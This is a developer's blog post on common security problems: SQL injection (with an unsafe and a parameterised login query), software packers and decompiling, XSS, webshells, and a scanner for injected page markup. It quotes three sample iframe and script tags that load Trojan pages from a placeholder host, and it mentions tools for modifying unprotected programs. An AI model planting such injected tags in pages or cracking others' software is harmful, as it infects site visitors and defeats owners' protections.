I have been at the company for two weeks and have learned about its situation. Because the company runs a live website, the security of that website is very important. So a few days ago, using spare time at home, I ran a security test against all of the company's products. The results were startling: one bug exposed all of the company's customer data, and that data could be modified or destroyed at will. If someone else had found it, the loss to the company is easy to imagine. I contacted the manager immediately to explain the situation. My colleagues have 3-5 years of work experience, yet do they not care about these security issues? Or do they simply not know about them? That is not the point; the point is that I found the bug. So today I want to write down a few things that I hope will give friends who have never touched this area a new understanding. This article will not cover everything.
First, let's talk about C/S (client/server) architecture programs. All of the program's dynamic link libraries and configuration information are stored on the client, which means that if the software protection measures are incomplete, the program can be penetrated and cracked at any time.
For example, assume we have a C/S client program that provides paid commercial functions to customers. Some user information will then be stored in a database. The user enters an account and password in the program, which are sent to the database for verification, and the user's consumption information is returned to the client program for display. During the login process you must pay attention to validating the data the user enters. If no validation is performed, malicious data submitted to the server may bypass the verification outright and let anyone use the software. The most obvious problem is SQL injection. I won't go into how much harm SQL injection can cause; look up the SQL injection techniques for details. An attacker can obtain all the information in your database, and can even obtain database server privileges and control your server as if it were their own machine.
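The login check described above, written two ways as an added example (this is not the company's code; the table, accounts and balances are constructed): a concatenated query, in which the submitted password becomes part of the SQL text, beside a parameterised query, in which the driver binds the values so the input can never change the statement.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the product's user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT, balance INTEGER)")
    con.execute("INSERT INTO users VALUES ('alice', 's3cret', 120)")
    con.commit()
    return con


def login_unsafe(con, name, password):
    """Vulnerable: user input is spliced into the SQL string, so a quote in
    the password rewrites the WHERE clause and the check can be bypassed."""
    sql = ("SELECT balance FROM users WHERE name = '%s' AND password = '%s'"
           % (name, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, name, password):
    """Hardened: placeholders are bound by the driver, so the input is only
    ever compared as data and the statement structure is fixed."""
    sql = "SELECT balance FROM users WHERE name = ? AND password = ?"
    row = con.execute(sql, (name, password)).fetchone()
    return row[0] if row else None
```

The returned balance stands in for the "consumption information" the post says is sent back to the client; a None result means the login was rejected.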
User data problems can be handled with care. The more important problem is program protection. Software has the concept of a protective shell (packer): encrypting the compiled software so that it cannot be decompiled and its resources cannot be read with a resource viewer. These are my personal understandings and may not be the professional terminology. A program that is "unshelled", i.e. left as it came out of the compiler, can easily be decompiled with tools or have its resources modified. You can use the PEiD v0.94 tool to check whether a program has a shell.
Take a program written in WinForms and look at it with PEiD: it clearly shows that the software was developed with Microsoft Visual C#/Basic .NET. A Delphi or C++ program without a shell is identified just as easily. There is also the "Shuhua" tool, which can disguise a program written in .NET as C++, VB or Delphi; of course it is only a disguise, and I won't introduce it here. Why does this matter? If you know the language a program was written in, you can find the corresponding decompiler or resource editor and modify the program. For example, the .NET decompiler Reflector can recover a program's source code, though of course only for shell-less code. For Delphi, C++ and similar programs I usually use tools such as "Compile exclusive", ResHacker and ResScope. These tools can open the interface resources of a shell-less program and change the copyright and other information at will; some Chinese-language software found on the Internet has been modified this way.
So what about software with a shell, and what about unpacking (shell removal)? Software that has been shelled has all of its resources encrypted, so they cannot be decompiled or modified directly. However, a shell is not absolutely safe, because shells can be removed, although the difficulty rises as shell vendors keep changing their algorithms. The strongest shell I have ever encountered is a commercial protective shell from outside China, Themida; I have never succeeded in removing it, and nobody on the websites that specialise in software security has published a way to handle this case either.
As for how to add a shell: the simple approach just runs the program through a packing tool, and the strong tools are generally foreign. Here I will introduce a software security website that is very popular and well known in China, the "Looking at the Snow" software security site; I have downloaded many software security tools from it.
Now let's talk about common attacks on web programs. Some of my friends may have found code like the following in their website's source:
<IFRAME src = http://www.xxx.com/muma.html width = 0 Height = 0> </iframe>
<SCRIPT src = http://www.xxx.com/muma.js> </SCRIPT>
<Script language = "jscript. encode" src = http://www.xxx.com/muma.txt> </SCRIPT>
If you find code similar to the above in your website (these are only the common forms), your website certainly has a security problem: your server may have been hacked, or a machine on the same intranet as your server may have been compromised. This situation is called "hanging a Trojan". From a programmer's point of view it only introduces a script file or a frame that loads another page, which may not affect the display at all. However, the page or JS that is introduced carries the real danger: it can install Trojans or viruses on the machines of users who visit your website, and even bring those machines under control. The page being loaded is called a "Wangma" (web Trojan). Web Trojans generally work through operating system vulnerabilities. That is, if your machine has the Microsoft Update patches installed, the chance of being hit by a web Trojan is relatively small, but you cannot say it is zero, because there may be "0day web Trojans". A 0day is an unknown security vulnerability, one for which Microsoft has not published a patch or has not even discovered yet.
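A defender-side check for the three markup patterns listed above, as an added example (not code from the original post): a small scanner built on Python's standard HTMLParser that flags iframes and scripts whose src points at a host other than the site's own, zero-size iframes, and scripts declared with the "jscript.encode" language. The sample page and the own-host name are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectedMarkupScanner(HTMLParser):
    """Collects (tag, src, reasons) for iframe/script tags that look injected."""

    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        # HTMLParser lowercases tag and attribute names and tolerates the
        # unquoted, space-padded "src = http://..." form seen in the post.
        a = {k: (v or "").strip() for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and host != self.own_host:
            reasons.append("foreign-src")        # loaded from another site
        if tag == "iframe" and (a.get("width") in ("0", "0px")
                                or a.get("height") in ("0", "0px")):
            reasons.append("zero-size")          # invisible frame
        if tag == "script" and "encode" in a.get("language", "").lower():
            reasons.append("encoded-script")     # jscript.encode obfuscation
        if reasons:
            self.findings.append((tag, src, reasons))


def scan_page(html, own_host):
    """Return the list of suspicious tags found in one page of markup."""
    p = InjectedMarkupScanner(own_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed page: one legitimate local script plus the three injected forms.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<script src="/static/app.js"></script>
<IFRAME src = http://www.xxx.com/muma.html width = 0 Height = 0> </iframe>
<SCRIPT src = http://www.xxx.com/muma.js> </SCRIPT>
<Script language = "jscript. encode" src = http://www.xxx.com/muma.txt> </SCRIPT>
</body></html>"""
```

Running scan_page over every page served by the site (or over the files in the web root) gives a quick way to notice a hung Trojan before visitors do.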
Similarly, you must strictly filter the information users enter on the website; otherwise SQL injection and cross-site scripting vulnerabilities follow. For example, suppose your website has an article posting function. If you do not filter the submitted string for HTML tags or scripts, a script will be inserted into the database and served back to every reader, so the content must be filtered.
Some of my friends' websites have been maliciously modified; they found the injected code and removed it, only to be hit again a short while later. This is most likely due to one of the following situations:
1. A webshell was obtained
2. The server was intruded
3. A machine on the server's intranet was intruded
A webshell is a web-based intrusion script, or simply an ASP or PHP Trojan backdoor. After hackers intrude into a website, they often place these ASP or PHP backdoor files in the web directory of the website's server, mixed in with normal web page files. They can then control the server over the web through the backdoor, including uploading and downloading files, viewing databases, and executing arbitrary commands. A Google search turns up many articles on preventing webshell attacks. From a webshell, attackers can go on to privilege escalation, obtain server permissions, and take direct control of the server to perform any operation.
This is what I have learned so far. I have not explained many of the terms in detail, because plenty of detailed information can be found on the Internet. I hope all my friends will pay attention to security issues, and share in the comments if they have more things to watch out for.